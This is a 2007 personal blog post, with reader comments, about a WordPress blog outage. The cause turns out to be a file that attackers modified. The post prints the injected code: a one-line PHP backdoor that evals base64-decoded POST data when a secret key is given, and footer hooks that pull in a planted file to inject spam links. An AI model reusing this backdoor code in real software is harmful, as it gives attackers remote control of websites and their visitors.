IBMer working on Lotus Connections by day (and night!) and with interests in agile development, Macs, dogs and gadgets!

Blog error

Posted: November 30th, 2007 | Author: Adrian Spender | Filed under: Uncategorized | 4 Comments »

This blog appeared to be down for some time today. It appeared that somehow the default_filters.php file in WordPress got some corruption. Replacing it with the default file from a WordPress 2.3.1 download solved the problem. Google hasn’t thrown up anything that throws any light on the problem. The corrupted file had a timestamp of today and contained some additional stuff over and above the default file content, such as:

This was declared at the top of he file:

if($_GET['0cc9b18defb8385c']=="1a84882ba2eb254c"){ eval(base64_decode($_POST['file'])); exit; }

Then there was this add_action function:

add_action('wp_footer','wpc7c16b8466d864eeefd20050625c7775');
function wpc7c16b8466d864eeefd20050625c7775() {
@include('./wp-includes/class-mail.php');
if(sizeof($wparr)>0){
shuffle($wparr);
echo "!div id=\"goro\"!";
foreach($wparr as $k=>$v){
echo "".ucwords($v['key'])."\n";
if($i++==$inum) break;
}
echo "!/div!".$_footer;
}
}

And this at the bottom:

add_action('wp_footer','wpc7c16b8466d864eeefd20050625c7775');
function wpc7c16b8466d864eeefd20050625c7775() {
@include('./wp-includes/class-mail.php');
if(sizeof($wparr)>0){
echo "!div id=\"goro\"!";
foreach($wparr as $k=>$v){
echo "".ucwords($v['key'])."\n";
if($i++==$inum) break;
}
echo "!/div!".$_footer;
}
}

(N.B. !div! is an HTML DIV tag but this causes problems if I embed it in the post)

Which is obviouly trying to declare the same function ‘wpc7c16b8466d864eeefd20050625c7775′ twice (which the error message identified) I have no idea what was inserting this code, so I’ve left it all out for the time being. I suspect it may be a badly behaving plugin, so apologies if some aspect of the blog doesn’t work correctly. If anybody has any ideas I’d love to hear them.

4 Comments on “Blog error”

  1. 1 Anton Piatek said at 16:23 on December 1st, 2007:

    Looks to me like your blog got hacked and that is the code for a backdoor…
    The first line looks like it allows someone to load a file into your blog via a http post, which means they can do whatever they want.

    I would change passwords on the blog and start checking for other security problems – That code is not benign!

  2. 2 Adrian Spender said at 17:14 on December 1st, 2007:

    Unfortunately it looks like you are right. class-mail.php isn’t part of WordPress and seems to have been inserted into my wp-includes directory somehow, probably by the method you highlight. How somebody got the backdoor in in the first place is unknown. There is nothing to suggest that they gained access to the filesystem on my host (and no it isn’t world-writable either)

    The contents of class-mail.php contained the assignment of two variables to the contents of a couple of Base 64 encode strings. One contained a load of binary data and some links to an innocuous looking web site blog at digitalsweeties.com The second decoded into a Javascript function to display an ad from googlesyndication.com

    Looks like it has happened to others as well, and is probably an exploit of a WordPress vulnerability

  3. 3 Adrian Spender said at 17:15 on December 1st, 2007:

    Edited to add. This happened well after I recently upgraded to WordPress 2.3.1 as well!

  4. 4 Andy Piper said at 04:31 on December 13th, 2007:

    Eek. Well I assume that WP.com blogs are not vulnerable to whatever backdoor these folks found.

Leave a Reply